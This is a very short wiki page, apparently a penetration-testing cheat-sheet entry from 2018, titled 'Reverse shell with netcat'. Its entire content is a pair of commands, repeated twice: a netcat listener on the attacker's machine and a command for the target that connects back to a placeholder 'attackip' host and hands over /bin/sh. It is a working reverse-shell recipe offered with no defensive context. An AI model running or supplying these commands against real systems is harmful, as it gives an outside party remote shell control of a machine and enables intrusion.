Reverse shell with netcat
Revision as of 07:16, 12 June 2018 by Rafahsolis (talk | contribs) (Created page with "Attacbox: nc -lvp 4444 Target: nc attackip 4444 -e /bin/sh")
Attacbox:
nc -lvp 4444
Target:
nc attackip 4444 -e /bin/sh
Attacbox:
nc -lvp 4444
Target:
nc attackip 4444 -e /bin/sh